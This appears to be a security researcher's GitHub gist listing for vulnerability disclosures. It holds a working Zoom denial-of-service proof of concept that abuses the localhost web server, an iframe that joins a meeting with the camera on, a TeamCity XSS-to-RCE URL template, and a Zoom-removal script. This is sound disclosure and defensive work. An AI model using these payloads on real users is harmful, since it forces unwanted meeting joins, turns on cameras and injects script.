Skip to content

Instantly share code, notes, and snippets.

View JLLeitschuh's full-sized avatar

Jonathan Leitschuh JLLeitschuh

View GitHub Profile
@JLLeitschuh
JLLeitschuh / zoom_poc_dos.html
Created July 7, 2019 04:01
Denial of service POC for Zoom
<body>
<script>
// It's actually better if this number isn't a valid zoom number.
var attackNumber = "694138052"
setInterval(function(){
var image = document.createElement("img");
// Use a date to bust the browser's cache
var date = new Date();
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
@JLLeitschuh
JLLeitschuh / zoom_poc_iframe.html
Created July 8, 2019 13:58
Simple POC that launches Zoom on Mac with your video camera activated using an iframe.
<iframe src="https://zoom.us/j/492468757"/>
@JLLeitschuh
JLLeitschuh / permanent_zoom_server_remover.sh
Created July 8, 2019 23:17
Permanently removes the Zoom localhost webserver and prevents it from being reinstalled in the future.
rm -rf ~/.zoomus
touch ~/.zoomus
# For just your local account
defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# For all users on the machine
sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# To prevent the vulnerable server from running on your machine
# (this does not impact Zoom functionality), run these two lines in your Terminal.
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
# (You may need to run these lines for each user on your machine.)
@JLLeitschuh
JLLeitschuh / CVE-2019-15848.md
Last active December 29, 2019 01:30
Full POC for CVE-2019-15848

CVE-2019-15848: TeamCity XSS to Remote Code Execution

This POC demonstrates taking advantage of a XSS vulnerability in TeamCity allowing an attacker to achieve Remote Code Execution on a build agent if the victim has the ability to add steps to a CI job.

POC

The POC can be simplified to the following URL:

https://[domain.com]/project.html?projectId=[target_project_id]&amp;tab=problems%27%7D)%3B%7D)()%3B[JS_PAYLOAD]

Artifact Server Annoucements

This document captures the links to all of the different artifact server hosts that have announced they will be formally depricating downloading dependencies over HTTP and will only be supporting HTTPS starting in January 2020.

mitm_build

Want to take over the Java ecosystem? All you need is a MITM!

Maven Sonatype

@JLLeitschuh
JLLeitschuh / How To Use GitHub Security Advisories.md
Last active July 14, 2020 16:55
An explanation of how to work with GitHub security advisories.

GitHub Security Advisories

If this is your first time using GitHub Security Advisories, please allow me to guide you through how they work.

Advisories are Private

As of September 17th, 2019, when advisories are published, the entire discussion within the advisory will not be made public. Any information you want to provide to the public should be included in the advisory body.

Updating an Advisory

@JLLeitschuh
JLLeitschuh / CVE-2019-19389-Ktor-CWE-113.md
Last active October 23, 2020 08:29
POC For: CVE-2019-19389